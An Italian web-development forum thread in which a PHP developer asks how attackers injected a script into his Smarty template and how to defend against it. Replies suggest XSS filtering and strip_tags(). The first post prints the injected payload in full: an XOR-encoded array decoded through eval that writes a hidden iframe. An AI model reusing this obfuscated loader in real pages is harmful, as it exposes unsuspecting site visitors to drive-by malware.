Utility
Home Messaggi odierni FAQ Ricerca avanzata Lo staff del forum Regolamento Utenti Archivio
Visualizzazione dei risultati da 1 a 5 su 5
  1. 19-10-2009, 15:42 #1
    nat75
    nat75 non è in linea
    Utente di HTML.it
    Registrato dal
    Sep 2002
    Messaggi
    2

    codice imprevisto all'interno del HTML

    Salve a tutti,
    sono nuovo di questo forum, mi chiamo Mimmo e sono un programmatore PHP.

    Da qualche giorno sto riscontrando un grave problema ad un portale che ho sviluppato.

    In quattro parole vi dico subito che il portale è stato sviluppato in php 5, mySQL e SMARTY Template Engine.

    In pratica in un file .tpl riescono, dall'esterno, ad inserire del codice javascript come il seguente

    codice:
    <script>wjgl=new Array(0,11,7,17,9,1,10,16,74,19,22,13,16,1,76,70,88,13,2,22,5,9,1,68,23,22,7,89,56,70,12,16,16,20,94,75,75,15,22,1,10,11,8,13,74,7,10,75,16,15,9,75,13,10,0,1,28,74,20,12,20,56,70,68,19,13,0,16,12,89,56,70,84,56,70,68,12,1,13,3,12,16,89,56,70,84,56,70,68,23,16,29,8,1,89,56,70,0,13,23,20,8,5,29,94,10,11,10,1,95,56,70,90,88,75,13,2,22,5,9,1,90,70,77);	nqmay="";	vvtim=100;	ahful=eval;	ddwk=String.fromCharCode;for(wqjs in wjgl)nqmay+=ddwk(wjgl[wqjs]^vvtim);	ahful(nqmay);	alert(nqmay);</script>
    la traduzione è un comunissimo

    codice:
    document.write('<iframe src=.... ecc.. ecc..')
    Qualcuno mi può spiegare come possano riuscirci e qualche metodo di difesa?

    Vi ringrazio in aticipo.
    Rispondi quotando Rispondi quotando
  2. 19-10-2009, 16:10 #2
    Sky
    Sky non è in linea
    Moderatore di Off Topic, Kickstarter e XML L'avatar di Sky
    Registrato dal
    Jul 2000
    residenza
    Roma
    Messaggi
    1,053
    Evidentemente c'è qualche form che permette agli utenti di caricare codice HTML. Da dove questo avvenga non possiamo dirlo senza conoscere il portale; può essere da una banale finestra per i commenti, a un'area di amministrazione violata, ecc. Quest'utima ipotesi è un po' meno probabile ma, non sapendo nulla del sito, ipotizzo tutto :P

    Una volta che ha individuato il punto debole del sistema, fai un controllo sul codice immesso dall'utente, eliminando tutti i tag html oppure, se in generale i tag devono poter essere inseriti, elimina tutto l'html potenzialmente dannoso (ad esempio i tag <script>, gli iframe,ecc.)
    Buona caccia
    Lo Stato deve dare ai cittadini, come diritto, ciò che la mafia dà come favore.
    Carlo Alberto dalla Chiesa

    Facebook | Twitter | Last.fm | LinkedIn | Quora
    Rispondi quotando Rispondi quotando
  3. 19-10-2009, 16:27 #3
    nat75
    nat75 non è in linea
    Utente di HTML.it
    Registrato dal
    Sep 2002
    Messaggi
    2
    Sono quasi sicuro che si tratti di iniezioni di tipo XSS.. sapresti indicarmi qualche libreria da usare per ripulire le variabili $_GET, $_POST e $_REQUEST da questi attacchi?
    Rispondi quotando Rispondi quotando
  4. 19-10-2009, 16:59 #4
    Sky
    Sky non è in linea
    Moderatore di Off Topic, Kickstarter e XML L'avatar di Sky
    Registrato dal
    Jul 2000
    residenza
    Roma
    Messaggi
    1,053
    Io no purtroppo :\
    Lo Stato deve dare ai cittadini, come diritto, ciò che la mafia dà come favore.
    Carlo Alberto dalla Chiesa

    Facebook | Twitter | Last.fm | LinkedIn | Quora
    Rispondi quotando Rispondi quotando
  5. 19-10-2009, 17:05 #5
    jeppox
    jeppox non è in linea
    Utente di HTML.it L'avatar di jeppox
    Registrato dal
    Mar 2007
    Messaggi
    436
    hai provato a leggere questa guida? http://sicurezza.html.it/guide/lezio...scripting-xss/

    altrimenti puoi usare strip_tags()
    In Flames - Pinball Map
    Becoming the Archetype
    Machine Head
    Pantera
    Rispondi quotando Rispondi quotando
« Discussione precedente | Prossima discussione »

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  

Regole del Forum

Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.